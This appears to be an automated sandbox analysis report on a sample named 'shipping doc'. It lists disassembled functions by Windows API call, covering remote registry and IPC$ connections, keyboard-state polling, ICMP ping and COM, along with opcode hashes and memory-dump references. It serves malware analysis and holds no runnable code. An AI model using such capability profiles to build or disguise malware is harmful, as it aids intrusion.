                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 747408836-2268648507
                                                                                              • Opcode ID: e43ec6d3f3165314181e949c20982f580ddf1f013b1b3a4530ecd1508544c956
                                                                                              • Instruction ID: 85263a6b1457579d537dbc6ed1642166806fce6d37f3454d8957481a3567f5f7
                                                                                              • Opcode Fuzzy Hash: e43ec6d3f3165314181e949c20982f580ddf1f013b1b3a4530ecd1508544c956
                                                                                              • Instruction Fuzzy Hash: 80413D72900249AACF14FBE1DE86DEEB778AF55340F600125F605720A2EF356F49CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E6B57: _wcslen.LIBCMT ref: 000E6B6A
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001407A2
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001407BE
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001407DA
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00140804
                                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0014082C
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00140837
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0014083C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 323675364-22481851
                                                                                              • Opcode ID: 4af08e65d596324135dc5482bda68fc980f9ec5c91ef65635c7d2a99d4ba7bb5
                                                                                              • Instruction ID: e1fdf6191005805c1756c9aff52162f7e6ab966e327f4f288e3addb9385ef8da
                                                                                              • Opcode Fuzzy Hash: 4af08e65d596324135dc5482bda68fc980f9ec5c91ef65635c7d2a99d4ba7bb5
                                                                                              • Instruction Fuzzy Hash: 67411876D10229AFCF15EBA5DC85CEEB778BF48350B544129E905B7162EB30AE44CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 00163C5C
                                                                                              • CoInitialize.OLE32(00000000), ref: 00163C8A
                                                                                              • CoUninitialize.OLE32 ref: 00163C94
                                                                                              • _wcslen.LIBCMT ref: 00163D2D
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00163DB1
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00163ED5
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00163F0E
                                                                                              • CoGetObject.OLE32(?,00000000,0017FB98,?), ref: 00163F2D
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00163F40
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00163FC4
                                                                                              • VariantClear.OLEAUT32(?), ref: 00163FD8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 429561992-0
                                                                                              • Opcode ID: 8a6e7f74cd42024b41dc891f5de1d0cca69be96136e45e1118d4cafdfd390280
                                                                                              • Instruction ID: 50c747bfbb0f73f6aa57bfadf8d5bca1504fc4d0678e0ce82e52462f81689354
                                                                                              • Opcode Fuzzy Hash: 8a6e7f74cd42024b41dc891f5de1d0cca69be96136e45e1118d4cafdfd390280
                                                                                              • Instruction Fuzzy Hash: 63C145716083019FC700DF68C88496BB7E9FF89744F00495DF99A9B251DB31EE46CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoInitialize.OLE32(00000000), ref: 00157AF3
                                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00157B8F
                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00157BA3
                                                                                              • CoCreateInstance.OLE32(0017FD08,00000000,00000001,001A6E6C,?), ref: 00157BEF
                                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00157C74
                                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00157CCC
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00157D57
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00157D7A
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00157D81
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00157DD6
                                                                                              • CoUninitialize.OLE32 ref: 00157DDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2762341140-0
                                                                                              • Opcode ID: a6b11dff9ba49e0d9641ef7a452287ae132faa1a38e091c060d097370972d0fe
                                                                                              • Instruction ID: ee1bb2b00d5bfe36b11f8539c8929a8633b756c096a627ea25fc1ad4375b32b3
                                                                                              • Opcode Fuzzy Hash: a6b11dff9ba49e0d9641ef7a452287ae132faa1a38e091c060d097370972d0fe
                                                                                              • Instruction Fuzzy Hash: 8EC12C75A04105EFCB14DFA4D885DAEBBF9FF48305B148499E81AAB262D730ED85CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00175504
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00175515
                                                                                              • CharNextW.USER32(00000158), ref: 00175544
                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00175585
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0017559B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001755AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CharNext
                                                                                              • String ID:
                                                                                              • API String ID: 1350042424-0
                                                                                              • Opcode ID: 887458edb346fbe69ca30af66a2d66728f9da993b5b9a1ff0e0806916b772cf4
                                                                                              • Instruction ID: 25256d32ea45eb1228981b5e0929bed1910b49e22041077735335209d5320978
                                                                                              • Opcode Fuzzy Hash: 887458edb346fbe69ca30af66a2d66728f9da993b5b9a1ff0e0806916b772cf4
                                                                                              • Instruction Fuzzy Hash: A1617174904609EFDF10DF54CC859FE7BBAEF05764F108149F629A7290D7B49A80DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0013FAAF
                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0013FB08
                                                                                              • VariantInit.OLEAUT32(?), ref: 0013FB1A
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0013FB3A
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0013FB8D
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 0013FBA1
                                                                                              • VariantClear.OLEAUT32(?), ref: 0013FBB6
                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 0013FBC3
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0013FBCC
                                                                                              • VariantClear.OLEAUT32(?), ref: 0013FBDE
                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0013FBE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                              • String ID:
                                                                                              • API String ID: 2706829360-0
                                                                                              • Opcode ID: 001c516adc5e3382985edd6d90a5d285f6f15d78b2d02cd5ac6cd85fb6d6d6e9
                                                                                              • Instruction ID: f2e5a3c871a181562859009980c3a5e9744a18ebfa9101e65f71aa68a154c235
                                                                                              • Opcode Fuzzy Hash: 001c516adc5e3382985edd6d90a5d285f6f15d78b2d02cd5ac6cd85fb6d6d6e9
                                                                                              • Instruction Fuzzy Hash: DD415175E00219DFCF00DF64D854DEEBBB9EF18344F108069E91AA7661C730A986CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00149CA1
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00149D22
                                                                                              • GetKeyState.USER32(000000A0), ref: 00149D3D
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00149D57
                                                                                              • GetKeyState.USER32(000000A1), ref: 00149D6C
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00149D84
                                                                                              • GetKeyState.USER32(00000011), ref: 00149D96
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00149DAE
                                                                                              • GetKeyState.USER32(00000012), ref: 00149DC0
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00149DD8
                                                                                              • GetKeyState.USER32(0000005B), ref: 00149DEA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 44ea1a35add1699595fbced898ab0a396c0e82bfb1b0fc0005d020daf792ceee
                                                                                              • Instruction ID: 57a5fe405631055aa80734089d953689536ea5a7e47643f3005b6b4852142a33
                                                                                              • Opcode Fuzzy Hash: 44ea1a35add1699595fbced898ab0a396c0e82bfb1b0fc0005d020daf792ceee
                                                                                              • Instruction Fuzzy Hash: A341D874A047CA6DFF319BA088447B7BEB06F11344F04805EDAC65A6D2DBA599C8C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 001605BC
                                                                                              • inet_addr.WSOCK32(?), ref: 0016061C
                                                                                              • gethostbyname.WSOCK32(?), ref: 00160628
                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00160636
                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001606C6
                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001606E5
                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 001607B9
                                                                                              • WSACleanup.WSOCK32 ref: 001607BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                              • String ID: Ping
                                                                                              • API String ID: 1028309954-2246546115
                                                                                              • Opcode ID: c27723a42b33b927027cf193bcf5866b5905fa016ca3fcadd04bc33816665042
                                                                                              • Instruction ID: 2a740d87f718d867428e94754cfd88e57321a281d272bebed5d5df998ae7146e
                                                                                              • Opcode Fuzzy Hash: c27723a42b33b927027cf193bcf5866b5905fa016ca3fcadd04bc33816665042
                                                                                              • Instruction Fuzzy Hash: 36919F356042419FD321CF15D889F1BBBE0AF48318F1585A9F4AA9BAA2C730FD95CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharLower
                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                              • API String ID: 707087890-567219261
                                                                                              • Opcode ID: 3f148194d343d2949d250962b2ddb7fcccf8f4e9f4aaeaa40798c731177f59db
                                                                                              • Instruction ID: 2a76149a24d18362151f7dc444df3beade93db942fd7832f3405f6622b5eeeb5
                                                                                              • Opcode Fuzzy Hash: 3f148194d343d2949d250962b2ddb7fcccf8f4e9f4aaeaa40798c731177f59db
                                                                                              • Instruction Fuzzy Hash: 1A51B172A001169BCF24DFACCD509BEB3A5BF65324B614329E966E72C1DB31DE50C7A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CoInitialize.OLE32 ref: 00163774
                                                                                              • CoUninitialize.OLE32 ref: 0016377F
                                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0017FB78,?), ref: 001637D9
                                                                                              • IIDFromString.OLE32(?,?), ref: 0016384C
                                                                                              • VariantInit.OLEAUT32(?), ref: 001638E4
                                                                                              • VariantClear.OLEAUT32(?), ref: 00163936
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                              • API String ID: 636576611-1287834457
                                                                                              • Opcode ID: c7768b6f2789f64ea2604711a4f8bd7a66d37c4a0d43146382d7d9b77cf3ac0c
                                                                                              • Instruction ID: b51004be3750e77d6354a158f71cdaf642a57c0310c94bf88d52688a2c313b0f
                                                                                              • Opcode Fuzzy Hash: c7768b6f2789f64ea2604711a4f8bd7a66d37c4a0d43146382d7d9b77cf3ac0c
                                                                                              • Instruction Fuzzy Hash: 8861A071608301AFD311DF54CC89BAABBE8EF49714F10490DF9A59B291D770EE98CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001533CF
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001533F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString$_wcslen
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 4099089115-3080491070
                                                                                              • Opcode ID: df6f171a40e085b5dfb30d5a9017f032d1c8a34fcb64bc21ede00ed3547b5337
                                                                                              • Instruction ID: 099d189cb2abb098cf03a74b2236ac7752eb6f639d16602904fa862e41f3675c
                                                                                              • Opcode Fuzzy Hash: df6f171a40e085b5dfb30d5a9017f032d1c8a34fcb64bc21ede00ed3547b5337
                                                                                              • Instruction Fuzzy Hash: 49519D32900249BEDF19EBA1CD46EEEB7B8AF14340F644165F515730A2EB312F98DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                              • API String ID: 1256254125-769500911
                                                                                              • Opcode ID: 2140d0eae22ef27bdab97d5c31a6fa42fc2b45f435e33a3eb82811b914f7dca5
                                                                                              • Instruction ID: 71d3275c610428bc02b6733bb431509f8116822e0414cf6ecbd39a0384af0575
                                                                                              • Opcode Fuzzy Hash: 2140d0eae22ef27bdab97d5c31a6fa42fc2b45f435e33a3eb82811b914f7dca5
                                                                                              • Instruction Fuzzy Hash: 16413932A090278BCB209F7DC9D05BE77B5AFA5754B264129E821D72A4E731CD81C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001553A0
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00155416
                                                                                              • GetLastError.KERNEL32 ref: 00155420
                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 001554A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                              • API String ID: 4194297153-14809454
                                                                                              • Opcode ID: bfc9dc8271a32f9771690314e2a8d0921fe0269e826cc74e2168c64a1a8acd67
                                                                                              • Instruction ID: 96817264a2cc83cd062b2d99ff7a7f6ca526302c7b0a0f8550621da089f52393
                                                                                              • Opcode Fuzzy Hash: bfc9dc8271a32f9771690314e2a8d0921fe0269e826cc74e2168c64a1a8acd67
                                                                                              • Instruction Fuzzy Hash: 7A31E335A00604DFC710DF68C494AAABBB5EF05306F188069E815DF292E730DD8ACBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateMenu.USER32 ref: 00173C79
                                                                                              • SetMenu.USER32(?,00000000), ref: 00173C88
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00173D10
                                                                                              • IsMenu.USER32(?), ref: 00173D24
                                                                                              • CreatePopupMenu.USER32 ref: 00173D2E
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00173D5B
                                                                                              • DrawMenuBar.USER32 ref: 00173D63
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                              • String ID: 0$F
                                                                                              • API String ID: 161812096-3044882817
                                                                                              • Opcode ID: 0e31ce0faff646725eae98695555b65a09693f621bd6836d9f99da0b84ef9d38
                                                                                              • Instruction ID: 0a90193dcfa9218251a76510c49e590e5b5cc6b8e6e449eaea39f99eee40e397
                                                                                              • Opcode Fuzzy Hash: 0e31ce0faff646725eae98695555b65a09693f621bd6836d9f99da0b84ef9d38
                                                                                              • Instruction Fuzzy Hash: 01419878A01209EFDB24CFA4D884AEA7BB5FF49310F14402DF95AA7360D771AA50DF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00173A9D
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00173AA0
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00173AC7
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00173AEA
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00173B62
                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00173BAC
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00173BC7
                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00173BE2
                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00173BF6
